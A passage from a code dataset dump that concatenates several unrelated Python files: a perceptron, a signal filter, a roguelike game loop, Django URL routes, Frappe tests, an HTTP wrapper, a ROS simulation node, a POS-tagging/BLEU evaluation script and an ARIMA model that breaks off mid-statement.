        # Perceptron loss: sum of |score| over misclassified samples.
        _, _, bad_scores = self.__misclassified(dataset, labels)
        return abs(bad_scores).sum()

    def __sgd_step(self, dataset, labels, learning_rate=0.1):
        # Pick one misclassified sample at random and nudge the
        # hyperplane toward classifying it correctly.
        bad_x, bad_y, _ = self.__misclassified(dataset, labels)
        pick = int(np.random.uniform(0, len(bad_y)))
        self.weight = self.weight + learning_rate * bad_y[pick] * bad_x[pick]
        self.bias = self.bias + learning_rate * bad_y[pick]

    def train(self, dataset, labels, loops=100):
        """Run up to ``loops`` SGD steps with a decaying learning rate,
        stopping early once the loss reaches zero."""
        for loop in range(loops):
            if self.__loss(dataset, labels) == 0:
                break
            learning_rate = 1 / (1 + loop) + 0.0001
            self.__sgd_step(dataset, labels, learning_rate)
| 2.828125 | 3 |
pygama/dsp/_processors/trap_filter.py | sweigart/pygama | 1 | 16980 | <filename>pygama/dsp/_processors/trap_filter.py
import numpy as np
from numba import guvectorize
@guvectorize(["void(float32[:], int32, int32, float32[:])",
              "void(float64[:], int32, int32, float64[:])",
              "void(int32[:], int32, int32, int32[:])",
              "void(int64[:], int32, int32, int64[:])"],
             "(n),(),()->(n)", nopython=True, cache=True)
def trap_filter(wf_in, rise, flat, wf_out):
    """
    Symmetric trapezoidal filter with rise/fall length ``rise`` and
    flat-top length ``flat``, computed recursively: each output sample
    is the previous one plus/minus input samples at lags 0, rise,
    rise+flat and 2*rise+flat, once each lag becomes available.
    """
    wf_out[0] = wf_in[0]
    # Ramp-up: only the newest-sample term is available yet.
    for i in range(1, rise):
        wf_out[i] = wf_out[i-1] + wf_in[i]
    # Flat-top region: subtract the sample leaving the leading window.
    for i in range(rise, rise+flat):
        wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise]
    # Ramp-down term joins once lag rise+flat is reachable.
    for i in range(rise+flat, 2*rise+flat):
        wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise] - wf_in[i-rise-flat]
    # Steady state: all four lags contribute.
    for i in range(2*rise+flat, len(wf_in)):
        wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise] - wf_in[i-rise-flat] + wf_in[i-2*rise-flat]
| 2.515625 | 3 |
other.py | nunenuh/idcard_datagen | 1 | 16981 |
def is_true(a, b, c, d, e, f, g):
    """Print 10 when ``a`` exceeds 10; parameters b..g are unused.
    Always returns None."""
    if a <= 10:
        return
    print(10)
pilferer/engine.py | Sebastian-dm/pilferer | 0 | 16982 | <reponame>Sebastian-dm/pilferer<filename>pilferer/engine.py
import tcod
from input_handlers import handle_keys
from game_states import GameStates
from render_functions import clear_all, render_all, RenderOrder
from map_objects.game_map import GameMap
from fov_functions import initialize_fov, recompute_fov
from entity import Entity, get_blocking_entity_at_location
from components.fighter import Fighter
from death_functions import kill_monster, kill_player
VERSION = "0.2"
FONT = 'assets/arial10x10.png'
# Console size in tiles.
screen_width = 80
screen_height = 50
# Map generation parameters (map occupies the top 45 rows of the console).
map_width = 80
map_height = 45
room_max_size = 10
room_min_size = 6
max_rooms = 30
# Field-of-view settings; algorithm index is passed straight to tcod
# (0 is the library's basic algorithm — confirm against tcod docs).
fov_algorithm = 0
fov_light_walls = False
fov_radius = 10
max_monsters_per_room = 3
# Tile colors keyed by material and lighting state.
colors = {
    'dark_wall': tcod.Color(0, 0, 0),
    'light_wall': tcod.Color(120, 120, 80),
    'dark_ground': tcod.Color(150, 150, 150),
    'light_ground': tcod.Color(200, 200, 150)
}
def main():
    """ Main game function: set up the player, console and map, then run
    the render/input/turn loop until the window closes or the player
    chooses to exit. Returns True on a user-initiated exit. """
    # Player entity with a fighter component for combat stats.
    fighter_component = Fighter(hp=30, defense=2, power=5)
    player = Entity(0, 0, '@', tcod.white, 'Player', blocks=True,
                    render_order=RenderOrder.ACTOR, fighter=fighter_component)
    entities = [player]
    # Import font
    tcod.console_set_custom_font(FONT, tcod.FONT_TYPE_GREYSCALE | tcod.FONT_LAYOUT_TCOD)
    # Console initialization
    tcod.console_init_root(screen_width, screen_height, 'Pilferer %s'%VERSION, False, vsync=False)
    con = tcod.console.Console(screen_width, screen_height)
    # Mapping
    game_map = GameMap(map_width, map_height)
    game_map.make_map(max_rooms, room_min_size, room_max_size, map_width,
                      map_height, player, entities, max_monsters_per_room)
    # FOV
    fov_recompute = True
    fov_map = initialize_fov(game_map)
    # Variables for holding input
    key = tcod.Key()
    mouse = tcod.Mouse()
    # Game state
    game_state = GameStates.PLAYERS_TURN
    # Main game loop
    while not tcod.console_is_window_closed():
        # FOV: only recompute after the player has moved.
        if fov_recompute:
            recompute_fov(fov_map, player.x, player.y, fov_radius, fov_light_walls, fov_algorithm)
        # Draw
        render_all(con, entities, player, game_map, fov_map, fov_recompute, screen_width, screen_height, colors)
        fov_recompute = False
        tcod.console_flush()
        clear_all(con, entities)
        # Input handling
        tcod.sys_check_for_event(tcod.EVENT_KEY_PRESS, key, mouse)
        action = handle_keys(key)
        # Command move
        player_turn_results = []
        move = action.get('move')
        if move and game_state == GameStates.PLAYERS_TURN:
            dx, dy = move
            destination_x = player.x + dx
            destination_y = player.y + dy
            if not game_map.is_blocked(destination_x, destination_y):
                # Moving into a blocking entity attacks it instead.
                target = get_blocking_entity_at_location(entities, destination_x, destination_y)
                if target:
                    attack_results = player.fighter.attack(target)
                    player_turn_results.extend(attack_results)
                else:
                    player.move(dx, dy)
                    fov_recompute = True
                game_state = GameStates.ENEMY_TURN
        # Command exit
        exit = action.get('exit')
        if exit:
            return True
        # Command Fullscreen
        fullscreen = action.get('fullscreen')
        if fullscreen:
            tcod.console_set_fullscreen(not tcod.console_is_fullscreen())
        # Results of the player's turn: print messages, resolve deaths.
        for player_turn_result in player_turn_results:
            message = player_turn_result.get('message')
            dead_entity = player_turn_result.get('dead')
            if message:
                print(message)
            if dead_entity:
                if dead_entity == player:
                    message, game_state = kill_player(dead_entity)
                else:
                    message = kill_monster(dead_entity)
                print(message)
        # Monster turns
        if game_state == GameStates.ENEMY_TURN:
            for entity in entities:
                if entity.ai:
                    enemy_turn_results = entity.ai.take_turn(player, fov_map, game_map, entities)
                    for enemy_turn_result in enemy_turn_results:
                        message = enemy_turn_result.get('message')
                        dead_entity = enemy_turn_result.get('dead')
                        if message:
                            print(message)
                        if dead_entity:
                            if dead_entity == player:
                                message, game_state = kill_player(dead_entity)
                            else:
                                message = kill_monster(dead_entity)
                            print(message)
                        # Stop processing turns as soon as the player dies.
                        if game_state == GameStates.PLAYER_DEAD:
                            break
                    if game_state == GameStates.PLAYER_DEAD:
                        break
            else:
                game_state = GameStates.PLAYERS_TURN
        # NOTE(review): this unconditional reset also runs after the enemy
        # loop breaks on PLAYER_DEAD, clobbering the dead state each frame
        # and duplicating the for/else assignment above — confirm intent.
        game_state = GameStates.PLAYERS_TURN
# Script entry point.
if __name__ == '__main__':
    main()
galaxy/api/v2/urls.py | SamyCoenen/galaxy | 0 | 16983 | <reponame>SamyCoenen/galaxy
# (c) 2012-2019, Ansible by Red Hat
#
# This file is part of Ansible Galaxy
#
# Ansible Galaxy is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by
# the Apache Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Ansible Galaxy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License
# along with Galaxy. If not, see <http://www.apache.org/licenses/>.
from django.urls import path
from galaxy.api.v2 import views
app_name = 'api'
# v2 API routes. Route order matters: the specific 'collections/.../versions/'
# patterns must be matched before the generic '<namespace>/<name>' detail route.
urlpatterns = [
    # Collection Imports URLs
    path('collection-imports/<int:pk>/',
         views.CollectionImportView.as_view(),
         name='collection-import-detail'),
    # Collection Version list URLs
    path('collections/<int:pk>/versions/',
         views.VersionListView.as_view(),
         name='version-list'),
    path('collections/<str:namespace>/<str:name>/versions/',
         views.VersionListView.as_view(),
         name='version-list'),
    # Collection Version detail URLs
    path('collection-versions/<int:version_pk>/',
         views.VersionDetailView.as_view(),
         name='version-detail'),
    path('collections/<str:namespace>/<str:name>/versions/<str:version>/',
         views.VersionDetailView.as_view(),
         name='version-detail'),
    # Collection Version Artifact download URLs
    path('collection-versions/<int:pk>/artifact/',
         views.CollectionArtifactView.as_view(),
         name='version-artifact'),
    path('collections/<namespace>/<name>/versions/<version>/artifact/',
         views.CollectionArtifactView.as_view(),
         name='version-artifact'),
    # Collection URLs
    path('collections/',
         views.CollectionListView.as_view(),
         name='collection-list'),
    path('collections/<int:pk>/',
         views.CollectionDetailView.as_view(),
         name='collection-detail'),
    # NOTE: needs to come after 'collections/<int:collection_pk>/versions/'
    path('collections/<str:namespace>/<str:name>/',
         views.CollectionDetailView.as_view(),
         name='collection-detail'),
]
| 1.632813 | 2 |
mindhome_alpha/erpnext/stock/doctype/stock_settings/test_stock_settings.py | Mindhome/field_service | 1 | 16984 | # -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestStockSettings(unittest.TestCase):
	"""Tests for the Stock Settings ``clean_description_html`` flag."""
	def setUp(self):
		# Every test starts with HTML cleaning disabled.
		frappe.db.set_value("Stock Settings", None, "clean_description_html", 0)
	def test_settings(self):
		"""Enabling the flag after an item exists strips styling on reload."""
		item = frappe.get_doc(dict(
			doctype = 'Item',
			item_code = 'Item for description test',
			item_group = 'Products',
			description = '<p><span style="font-size: 12px;">Drawing No. 07-xxx-PO132<br></span><span style="font-size: 12px;">1800 x 1685 x 750<br></span><span style="font-size: 12px;">All parts made of Marine Ply<br></span><span style="font-size: 12px;">Top w/ Corian dd<br></span><span style="font-size: 12px;">CO, CS, VIP Day Cabin</span></p>'
		)).insert()
		settings = frappe.get_single('Stock Settings')
		settings.clean_description_html = 1
		settings.save()
		item.reload()
		self.assertEqual(item.description, '<p>Drawing No. 07-xxx-PO132<br>1800 x 1685 x 750<br>All parts made of Marine Ply<br>Top w/ Corian dd<br>CO, CS, VIP Day Cabin</p>')
		item.delete()
	def test_clean_html(self):
		"""With the flag already enabled, HTML is cleaned at insert time."""
		settings = frappe.get_single('Stock Settings')
		settings.clean_description_html = 1
		settings.save()
		item = frappe.get_doc(dict(
			doctype = 'Item',
			item_code = 'Item for description test',
			item_group = 'Products',
			description = '<p><span style="font-size: 12px;">Drawing No. 07-xxx-PO132<br></span><span style="font-size: 12px;">1800 x 1685 x 750<br></span><span style="font-size: 12px;">All parts made of Marine Ply<br></span><span style="font-size: 12px;">Top w/ Corian dd<br></span><span style="font-size: 12px;">CO, CS, VIP Day Cabin</span></p>'
		)).insert()
		self.assertEqual(item.description, '<p>Drawing No. 07-xxx-PO132<br>1800 x 1685 x 750<br>All parts made of Marine Ply<br>Top w/ Corian dd<br>CO, CS, VIP Day Cabin</p>')
		item.delete()
| 2.125 | 2 |
pybloxy/classes/http.py | R0bl0x10501050/roblox.py | 0 | 16985 | <filename>pybloxy/classes/http.py<gh_stars>0
import logging
import requests
class Http:
    """Thin wrapper around ``requests`` that logs non-200 responses.

    Every method returns the raw response body (bytes) on HTTP 200, or
    the return value of ``logging.error`` (None) otherwise. Methods are
    static so they work both as ``Http.sendRequest(url)`` (the original
    call style) and on instances.
    """

    @staticmethod
    def _check(verb, response):
        """Shared status handling: log and return None on any non-200
        status, otherwise return the response body."""
        if response.status_code != 200:
            return logging.error(f"[Pybloxy - {verb}] Something went wrong! Error Code: {response.status_code}")
        return response.content

    @staticmethod
    def sendRequest(url):
        """GET ``url``; return body bytes or None on failure."""
        return Http._check("GET", requests.get(str(url)))

    @staticmethod
    def postRequest(url, payload):
        """POST ``payload`` as form data to ``url``."""
        return Http._check("POST", requests.post(str(url), data=payload))

    @staticmethod
    def patchRequest(url, payload):
        """PATCH ``url`` with ``payload`` as form data."""
        return Http._check("PATCH", requests.patch(str(url), data=payload))

    @staticmethod
    def deleteRequest(url, payload):
        """DELETE ``url``.

        NOTE(review): ``payload`` was accepted but never sent in the
        original implementation; it is kept (unused) for backward
        compatibility — confirm whether it should be transmitted.
        """
        return Http._check("DELETE", requests.delete(str(url)))
resources/nuice_simulations/src/layers_sim/layers_sim_node.py | SpyGuyIan/NUice | 1 | 16986 | #!/usr/bin/env python
import rospy
from std_msgs.msg import Float64
import random
# Candidate material strengths; getNextLayerStrength() picks one per layer.
possibleLayers = [140, 50, 80, 200, 100]

# Latest drill position from /drill_motor/cur_position (written by
# position_callback, read by the publish loop in runLayersSim).
cur_position = 0.0
def position_callback(msg):
    """ROS subscriber callback: cache the drill's latest reported position."""
    global cur_position
    cur_position = msg.data
# Build the layers simulation, then publish material strengths. Lasts 100 seconds.
def runLayersSim():
    """Build a random stack of material layers covering depths 1..1000,
    then publish the strength at the drill's current position at 10 Hz
    until the drill reaches depth 1000 or ROS shuts down.
    """
    # NOTE: the original code drew an unused `numLayers` here; the layer
    # count is actually determined by the random sizes chosen below.
    a = 1
    layers = []
    while (a < 1000):
        # Pick the end of the next layer somewhere in (a, 1000].
        size = random.randint(a + 1, 1000) - a
        strength = getNextLayerStrength()
        setNextLayer(size, strength, layers)
        a = a + size
    pub = rospy.Publisher('material_strength', Float64, queue_size=10)
    rospy.init_node('layers_node', anonymous=True)
    rate = rospy.Rate(10)
    rospy.Subscriber("/drill_motor/cur_position", Float64, position_callback)
    while (not rospy.is_shutdown()) and cur_position < 1000:
        # Publish the strength of the layer at the drill's current depth.
        pub.publish(layers[int(cur_position)])
        rate.sleep()
# Get the strength of the next layer from the list of possible layer strengths.
def getNextLayerStrength():
    """Return a material strength drawn uniformly from possibleLayers."""
    # random.choice replaces the original manual randint-index lookup.
    return random.choice(possibleLayers)
# Build the next layer of the simulation.
def setNextLayer(size, strength, layers):
    """Append ``size`` entries of ``strength`` to ``layers``.

    Fixes an off-by-one in the original ``for i in range(1, size)`` loop,
    which appended only ``size - 1`` entries; the accumulated stack was
    then shorter than the drill's travel and ``layers[int(cur_position)]``
    could raise IndexError near the bottom.
    """
    layers.extend([strength] * size)
if __name__ == '__main__':
    # Start the simulation node when executed directly.
    runLayersSim()
| 2.5625 | 3 |
imagescraper/imagescraper/spiders/image_crawl_spider.py | karthikn2789/Scrapy-Projects | 2 | 16987 | import scrapy
import re
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from ..items import ImagescraperItem
class ImageCrawlSpiderSpider(CrawlSpider):
    """Crawl books.toscrape.com catalogue pages and yield one
    ImagescraperItem (with an absolute image URL) per product page."""

    name = "image_crawl_spider"
    allowed_domains = ["books.toscrape.com"]

    def start_requests(self):
        url = "http://books.toscrape.com/"
        yield scrapy.Request(url=url)

    # Follow every catalogue/ link and parse it for the product image.
    rules = (Rule(LinkExtractor(allow=r"catalogue/"), callback="parse_image", follow=True),)

    def parse_image(self, response):
        if response.xpath('//div[@class="item active"]/img').get() is not None:
            img = response.xpath('//div[@class="item active"]/img/@src').get()
            # "image_urls" requires absolute URLs, but the scraped src is
            # relative ("../../<path>"), so strip the prefix and re-root it.
            # The dots are escaped here: the original r"^(?:../../)(.*)$"
            # treated each "." as a wildcard, matching unintended prefixes.
            m = re.match(r"^(?:\.\./\.\./)(.*)$", img)
            # Guard against a non-matching src instead of crashing with
            # AttributeError on `None.group(1)`.
            relative = m.group(1) if m else img.lstrip("./")
            url = "http://books.toscrape.com/"
            img_url = "".join([url, relative])
            image = ImagescraperItem()
            image["image_urls"] = [img_url]  # "image_urls" must be a list
            yield image
| 2.921875 | 3 |
scripts/pos_eval.py | ProKil/sparse-text-prototype | 19 | 16988 | import os
import argparse
import subprocess
import random
import edlib
from typing import List
from collections import Counter
import stanza
class ExtractMetric(object):
    """Mutable accumulator for precision/recall/F1 bookkeeping."""

    def __init__(self, nume=0, denom_p=0, denom_r=0, precision=0, recall=0, f1=0):
        super(ExtractMetric, self).__init__()
        # Raw counts: matched tokens, precision denominator, recall denominator.
        self.nume = nume
        self.denom_p = denom_p
        self.denom_r = denom_r
        # Derived scores; the caller fills these in after counting.
        self.precision = precision
        self.recall = recall
        self.f1 = f1
def read_file(fname, len_cut):
    """Read a tab-separated file of (source, target) pairs.

    Pairs where either side has more than ``len_cut`` whitespace tokens
    are dropped. Returns two parallel lists of strings.
    """
    sources, targets = [], []
    with open(fname) as handle:
        for raw in handle:
            src, tgt = raw.rstrip().split('\t')
            if len(src.split()) > len_cut or len(tgt.split()) > len_cut:
                continue
            sources.append(src)
            targets.append(tgt)
    return sources, targets
def write_file(fname: str, data: List[str]):
    """Write one entry of ``data`` per line; list entries are space-joined."""
    with open(fname, 'w') as fout:
        for entry in data:
            text = ' '.join(entry) if isinstance(entry, list) else entry
            fout.write('{}\n'.format(text))
def eval_edit(prototype, example):
    """Tally POS statistics per edit operation between aligned sentence pairs.

    Args:
        prototype / example: parallel lists of stanza sentence objects
            (assumed to expose ``.words`` with ``.text`` / ``.upos`` —
            see the stanza pipeline set up at module level).

    Returns:
        dict: edit op ('=' equal, 'X' substitution, 'I' insertion,
        'D' deletion) -> Counter of POS-level descriptions of that op.
    """
    def flat_cigar(cigar):
        """flatten the result path returned by edlib.align
        """
        # Expand the run-length encoded cigar (e.g. "3=1X") into a flat
        # list of single-character ops (['=', '=', '=', 'X']).
        r = []
        pointer = 0
        while pointer < len(cigar):
            num = []
            while cigar[pointer].isdigit():
                num.append(cigar[pointer])
                pointer += 1
            num = int(''.join(num))
            r.extend([cigar[pointer]] * num)
            pointer += 1
        return r

    res = {}
    for p_sent, e_sent in zip(prototype, example):
        p_pos = [x.upos for x in p_sent.words]
        e_pos = [x.upos for x in e_sent.words]
        p_text = [x.text for x in p_sent.words]
        e_text = [x.text for x in e_sent.words]
        # Token-level alignment of the example against the prototype.
        edit_operation = edlib.align(e_text, p_text, task='path')
        edit_operation = flat_cigar(edit_operation['cigar'])
        # Build gap-padded token/POS sequences; -1 marks a gap.
        new_p_text = []
        new_e_text = []
        new_p_pos = []
        new_e_pos = []
        src_cur = tgt_cur = 0
        for edit in edit_operation:
            if edit == '=' or edit == 'X':
                # Match or substitution consumes one token on both sides.
                new_p_text.append(p_text[src_cur])
                new_p_pos.append(p_pos[src_cur])
                new_e_text.append(e_text[tgt_cur])
                new_e_pos.append(e_pos[tgt_cur])
                src_cur += 1
                tgt_cur += 1
            elif edit == 'I':
                # Insertion: token exists only on the example side.
                new_p_text.append(-1)
                new_p_pos.append(-1)
                new_e_text.append(e_text[tgt_cur])
                new_e_pos.append(e_pos[tgt_cur])
                tgt_cur += 1
            elif edit == 'D':
                # Deletion: token exists only on the prototype side.
                new_p_text.append(p_text[src_cur])
                new_p_pos.append(p_pos[src_cur])
                new_e_text.append(-1)
                new_e_pos.append(-1)
                src_cur += 1
            else:
                raise ValueError('{} edit operation is invalid!'.format(edit))

        # Record a POS-level description of every aligned edit op.
        for i, edit in enumerate(edit_operation):
            if edit not in res:
                res[edit] = Counter()
            if edit == '=':
                res[edit]['{}={}'.format(new_p_pos[i], new_e_pos[i])] += 1
            elif edit == 'X':
                res[edit]['{}->{}'.format(new_p_pos[i], new_e_pos[i])] += 1
            elif edit == 'I':
                res[edit]['+{}'.format(new_e_pos[i])] += 1
            elif edit == 'D':
                res[edit]['-{}'.format(new_p_pos[i])] += 1
            else:
                raise ValueError
    return res
def eval_f1(prototype, example):
    """Per-POS precision/recall/F1 of prototype tokens vs. example tokens.

    For each sentence pair, prototype tokens are matched against a
    bag-of-words of the example tokens; counts are bucketed by the
    prototype token's POS tag (recall side) and the example POS counts
    feed the precision denominator.
    """
    stats = {}

    def metric_for(tag):
        # Lazily create the accumulator for a POS tag.
        if tag not in stats:
            stats[tag] = ExtractMetric(
                nume=0,
                denom_p=0,
                denom_r=0,
                precision=0,
                recall=0,
                f1=0,
            )
        return stats[tag]

    for proto_sent, ex_sent in zip(prototype, example):
        remaining = Counter(w.text for w in ex_sent.words)
        for word in proto_sent.words:
            entry = metric_for(word.upos)
            entry.denom_r += 1
            # Greedy bag-of-words match against the example tokens.
            if remaining[word.text] > 0:
                remaining[word.text] -= 1
                entry.nume += 1
        for tag, count in Counter(w.upos for w in ex_sent.words).items():
            metric_for(tag).denom_p += count

    for tag, entry in stats.items():
        if entry.denom_p != 0 and entry.denom_r != 0 and entry.nume != 0:
            entry.precision = entry.nume / entry.denom_p
            entry.recall = entry.nume / entry.denom_r
            entry.f1 = 2 * entry.precision * entry.recall / (entry.precision + entry.recall)
    return stats
def sentence_bleu(ref_path, hypo_path):
    """Average per-sentence BLEU as reported by the ``fairseq-score`` CLI."""
    output = subprocess.getoutput(
        "fairseq-score --ref {} --sys {} --sentence-bleu".format(ref_path, hypo_path))
    # First output line is a header; field 3 of each remaining line is the
    # BLEU score followed by a comma.
    scores = []
    for line in output.split('\n')[1:]:
        scores.append(float(line.split()[3].rstrip(',')))
    return sum(scores) / len(scores)
def generate_rand_prototype(exp_dir, num):
    """Sample ``num`` random template sentences for the experiment's dataset.

    The dataset name is taken as the part of the experiment directory's
    basename before the first underscore, and mapped to its template file.
    """
    dataset_to_template = {
        "coco40k": "support_prototype/datasets/coco/coco.template.40k.txt",
        "yelp": "support_prototype/datasets/yelp_data/yelp.template.50k.lower.txt",
        "yelp_large": "support_prototype/datasets/yelp_large_data/yelp_large.template.100k.txt",
    }
    # Inlined from the original nested parse_exp_dir helper.
    dataset = exp_dir.rstrip('/').split('/')[-1].split('_')[0]
    command = "shuf -n {} {}".format(num, dataset_to_template[dataset])
    return subprocess.getoutput(command).split('\n')
# ---- CLI ------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Evaluate analysis metrics')
parser.add_argument('--prefix', type=str, choices=['inference', 'generation'],
                    help='prediction file prefix')
parser.add_argument('--exp-dir', type=str, help='output directory')

args = parser.parse_args()

# All results are appended to analysis_<prefix>_res.txt in the experiment dir.
fout = open(os.path.join(args.exp_dir, 'analysis_{}_res.txt'.format(args.prefix)), 'w')

len_cut = 1000
prototypes, examples = read_file(os.path.join(args.exp_dir, '{}_analysis_input.txt'.format(args.prefix)), len_cut=len_cut)

prototype_path = os.path.join(args.exp_dir, 'prototype.txt')
prototype_pos_path = os.path.join(args.exp_dir, 'prototype_pos.txt')
prototype_rand_path = os.path.join(args.exp_dir, 'prototype_rand.txt')
prototype_pos_rand_path = os.path.join(args.exp_dir, 'prototype_pos_rand.txt')
example_path = os.path.join(args.exp_dir, 'example.txt')
example_pos_path = os.path.join(args.exp_dir, 'example_pos.txt')

# Random-prototype baseline of the same size as the real example set.
prototypes_rand = generate_rand_prototype(args.exp_dir, len(examples))

write_file(prototype_path, prototypes)
write_file(example_path, examples)
write_file(prototype_rand_path, prototypes_rand)

# surface BLEU
# bleu = subprocess.getoutput(
#     "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_rand_path))
bleu = sentence_bleu(prototype_rand_path, example_path)
print('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')

# bleu = subprocess.getoutput(
#     "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_path))
bleu = sentence_bleu(prototype_path, example_path)
print('Regular BLEU: \n{}'.format(bleu))
fout.write('Regular BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')

# POS tagging
print('POS tagging')
nlp = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos', tokenize_pretokenized=True)
prototype_doc = nlp('\n'.join(prototypes))
example_doc = nlp('\n'.join(examples))
prototype_rand_doc = nlp('\n'.join(prototypes_rand))

prototypes_pos = [[word.upos for word in sent.words] for sent in prototype_doc.sentences]
examples_pos = [[word.upos for word in sent.words] for sent in example_doc.sentences]
prototypes_pos_rand = [[word.upos for word in sent.words]for sent in prototype_rand_doc.sentences]

write_file(prototype_pos_path, prototypes_pos)
write_file(example_pos_path, examples_pos)
write_file(prototype_pos_rand_path, prototypes_pos_rand)

# POS BLEU
# bleu = subprocess.getoutput(
#     "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_rand_path))
bleu = sentence_bleu(prototype_pos_rand_path, example_pos_path)
print('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')

# bleu = subprocess.getoutput(
#     "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_path))
bleu = sentence_bleu(prototype_pos_path, example_pos_path)
print('POS BLEU: \n{}'.format(bleu))
fout.write('POS BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')

# break down precision and recall
print("compute precision, recall, f1")
# Sanity check: the tagger is pretokenized, so it should keep one sentence
# per input line — presumably these lengths match; verify if they don't.
assert len(prototypes) == len(prototypes_pos)
assert len(examples) == len(examples_pos)

res = eval_f1(list(prototype_rand_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('random baseline precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
    fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')

res = eval_f1(list(prototype_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
    fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')

# edit operations
print("edit analysis")
res = eval_edit(list(prototype_doc.sentences), list(example_doc.sentences))
total = sum([sum(v.values()) for k, v in res.items()])
fout.write('total: {}\n'.format(total))
# Report ops by frequency, each with its POS-level breakdown and ratio.
res = sorted(res.items(), key=lambda item: (-sum(item[1].values())))
for k, v in res:
    fout.write('{}: {}\n'.format(k, sum(v.values())))
    for k1, v1 in v.most_common():
        fout.write('{}: {} ({:.3f}), '.format(k1, v1, v1 / sum(v.values())))
    fout.write('\n\n')
fout.close()
| 2.578125 | 3 |
tests/rules/test_git_stash_pop.py | RogueScholar/thefuck-termux | 0 | 16989 | <reponame>RogueScholar/thefuck-termux
import pytest
from thefuck.rules.git_stash_pop import get_new_command
from thefuck.rules.git_stash_pop import match
from thefuck.types import Command
@pytest.fixture
def output():
    """Stderr emitted by git when ``git stash pop`` hits local changes."""
    return """error: Your local changes to the following files would be overwritten by merge:"""
def test_match(output):
    # The rule fires for a failing `git stash pop`, but not for a plain
    # `git stash` with empty output.
    assert match(Command("git stash pop", output))
    assert not match(Command("git stash", ""))
def test_get_new_command(output):
    # The suggested fix stages local changes, pops the stash, then unstages.
    assert (get_new_command(
        Command("git stash pop",
                output)) == "git add --update && git stash pop && git reset .")
| 2.1875 | 2 |
src/arima_model.py | SaharCarmel/ARIMA | 0 | 16990 | """ The ARIMA model. """
import torch
import numpy as np
class ARIMA(torch.nn.Module):
    """A small ARIMA model with learnable difference / moving-average weights.

    NOTE(review): ``forward`` implements the ARIMA(0,1,1)-style update only
    (one lagged difference, one lagged error term); the ``p`` (AR) weights
    are allocated but never used — confirm before relying on p > 0.
    """

    def __init__(self,
                 p: int = 0,
                 d: int = 0,
                 q: int = 0) -> None:
        """General ARIMA model constructor.

        Args:
            p (int): The number of lag observations included in the model,
                also called the lag order.
            d (int): The number of times that the raw observations are
                differenced, also called the degree of differencing.
            q (int): The size of the moving average window,
                also called the order of moving average.
        """
        super(ARIMA, self).__init__()
        self.p = p
        self.pWeights = torch.rand(p)
        self.pWeights.requires_grad = True
        self.q = q
        self.qWeights = torch.rand(q)
        self.qWeights.requires_grad = True
        self.d = d
        self.dWeights = torch.rand(d)
        self.dWeights.requires_grad = True
        # Constant drift term; fit() does not take a gradient step on it.
        self.drift = torch.rand(1)

    def forward(self, x: torch.Tensor, err: torch.Tensor) -> torch.Tensor:
        """One-step-ahead prediction for the ARIMA(0,1,1) case.

        Args:
            x (torch.Tensor): All past observations (length >= 2).
            err (torch.Tensor): Error terms (length >= 2).

        Returns:
            torch.Tensor: The prediction for the next observation
            (1-element tensor).
        """
        zData = torch.diff(x)
        # z_t = d * z_{t-1} + q * e_{t-1} + e_t + drift, then undifference
        # by adding the last observation.
        zPred = self.dWeights * zData[-1] + \
            self.qWeights * err[-2] + err[-1] + self.drift
        aPred = zPred + x[-1]
        return aPred

    def generateSample(self, length: int) -> torch.Tensor:
        """Generate a synthetic series of ``length`` points from the model.

        Note:
            sample[0] is the first noise draw and sample[1] is left at 0 —
            the recursion needs two past points before it can run.

        Args:
            length (int): The length of the sample (must be >= 1).

        Returns:
            torch.Tensor: The generated sample.
        """
        sample = torch.zeros(length)
        noise = torch.tensor(np.random.normal(
            loc=0, scale=1, size=length), dtype=torch.float32)
        sample[0] = noise[0]
        with torch.no_grad():
            for i in range(length - 2):
                sample[i + 2] = self.forward(sample[:i + 2], noise[:i + 2])
        return sample

    def fit(self,
            trainData: torch.Tensor,
            epochs: int,
            learningRate: float) -> None:
        """Fit the d/q weights to ``trainData`` with plain gradient descent.

        Args:
            trainData (torch.Tensor): The training series (length >= 2).
            epochs (int): The number of epochs.
            learningRate (float): The learning rate.
        """
        dataLength = len(trainData)
        # One fixed random error sequence, shared across epochs.
        errors = torch.tensor(np.random.normal(
            loc=0, scale=1, size=dataLength), dtype=torch.float32)
        for epoch in range(epochs):
            prediction = torch.zeros(dataLength)
            # The first two points cannot be predicted (two past values needed).
            for i in range(dataLength - 2):
                prediction[i +
                           2] = self.forward(trainData[0:i + 2], errors[0:i + 2])
            loss = torch.mean(torch.pow(trainData - prediction, 2))
            print(f'Epoch {epoch} Loss {loss}')
            loss.backward()
            # Manual SGD step on the learnable weights, then reset grads.
            self.dWeights.data = self.dWeights.data - \
